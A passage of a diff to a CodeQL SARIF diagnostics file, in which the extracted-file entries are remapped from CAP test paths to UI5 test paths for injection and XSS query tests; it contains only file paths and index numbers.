"locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 71 + "index" : 66 } } } ], @@ -4830,7 +4806,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4842,9 +4818,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 72 + "index" : 67 } } } ], @@ -4856,7 +4832,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4868,9 +4844,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 73 + "index" : 68 } } } ], @@ -4882,7 +4858,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4894,9 +4870,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 74 + "index" : 69 } } } ], @@ -4908,7 +4884,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4920,9 +4896,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 75 + "index" : 70 } } } ], @@ -4934,7 +4910,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4946,9 +4922,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 76 + "index" : 71 } } } ], @@ -4960,7 +4936,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4972,9 +4948,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 77 + "index" : 72 } } } ], @@ -4986,7 +4962,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4998,9 +4974,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 78 + "index" : 73 } } } ], @@ -5012,7 +4988,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5024,9 +5000,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 79 + "index" : 74 } } } ], @@ -5038,7 +5014,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5050,9 +5026,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 80 + "index" : 75 } } } ], @@ -5064,7 +5040,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5076,9 +5052,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 81 + "index" : 76 } } } ], @@ -5090,7 +5066,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5102,9 +5078,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 1 + "index" : 77 } } } ], @@ -5116,7 +5092,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5128,9 +5104,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 82 + "index" : 78 } } } ], @@ -5142,7 +5118,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5154,9 +5130,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 83 + "index" : 79 } } } ], @@ -5168,7 +5144,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5180,9 +5156,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 84 + "index" : 80 } } } ], @@ -5194,7 +5170,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5206,9 +5182,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 85 + "index" : 81 } } } ], @@ -5220,7 +5196,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5232,9 +5208,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 86 + "index" : 82 } } } ], @@ -5246,7 +5222,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5258,9 +5234,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 87 + "index" : 83 } } } ], @@ -5272,7 +5248,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5284,9 +5260,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 2 + "index" : 84 } } } ], @@ -5298,7 +5274,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5310,9 +5286,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 88 + "index" : 85 } } } ], @@ -5324,7 +5300,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5336,9 +5312,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 89 + "index" : 86 } } } ], @@ -5350,7 +5326,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5362,9 +5338,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 90 + "index" : 87 } } } ], @@ -5376,7 +5352,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5388,9 +5364,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 91 + "index" : 88 } } } ], @@ -5402,7 +5378,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5414,9 +5390,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 92 + "index" : 89 } } } ], @@ -5428,7 +5404,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5440,9 +5416,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 93 + "index" : 90 } } } ], @@ -5454,7 +5430,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5466,9 +5442,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 94 + "index" : 91 } } } ], @@ -5480,7 +5456,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5492,9 +5468,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 95 + "index" : 92 } } } ], @@ -5506,7 +5482,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5518,9 +5494,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 96 + "index" : 93 } } } ], @@ -5532,7 +5508,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5544,9 +5520,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 97 + "index" : 94 } } } ], @@ -5558,7 +5534,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5570,9 +5546,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 98 + "index" : 95 } } } ], @@ -5584,7 +5560,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5596,9 +5572,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 99 + "index" : 96 } } } ], @@ -5610,7 +5586,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5622,9 +5598,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 100 + "index" : 97 } } } ], @@ -5636,7 +5612,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5648,9 +5624,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 101 + "index" : 98 } } } ], @@ -5662,7 +5638,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5674,9 +5650,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 102 + "index" : 99 } } } ], @@ -5688,7 +5664,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5700,9 +5676,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 100 } } } ], @@ -5714,7 +5690,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5726,9 +5702,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 104 + "index" : 101 } } } ], @@ -5740,7 +5716,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5752,9 +5728,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 105 + "index" : 102 } } } ], @@ -5766,7 +5742,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5778,9 +5754,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 103 } } } ], @@ -5792,7 +5768,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5804,9 +5780,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 107 + "index" : 104 } } } ], @@ -5818,7 +5794,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5830,9 +5806,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 105 } } } ], @@ -5844,7 +5820,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5856,9 +5832,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 109 + "index" : 106 } } } ], @@ -5870,7 +5846,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5882,9 +5858,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 110 + "index" : 107 } } } ], @@ -5896,7 +5872,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5908,9 +5884,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 111 + "index" : 108 } } } ], @@ -5922,7 +5898,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5934,9 +5910,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", "uriBaseId" : "%SRCROOT%", - "index" : 112 + "index" : 109 } } } ], @@ -5948,7 +5924,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5960,9 +5936,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 113 + "index" : 110 } } } ], @@ -5974,7 +5950,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5986,9 +5962,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 111 } } } ], @@ -6000,7 +5976,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6012,9 +5988,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 115 + "index" : 112 } } } ], @@ -6026,7 +6002,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6038,9 +6014,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 116 + "index" : 113 } } } ], @@ -6052,7 +6028,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6064,9 +6040,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 117 + "index" : 114 } } } ], @@ -6078,7 +6054,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6090,9 +6066,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 118 + "index" : 115 } } } ], @@ -6104,7 +6080,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6116,9 +6092,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 119 + "index" : 116 } } } ], @@ -6130,7 +6106,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6142,9 +6118,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 120 + "index" : 117 } } } ], @@ -6156,7 +6132,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6168,9 +6144,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 121 + "index" : 118 } } } ], @@ -6182,7 +6158,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6194,9 +6170,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 119 } } } ], @@ -6208,7 +6184,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6220,7 +6196,85 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 120 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + 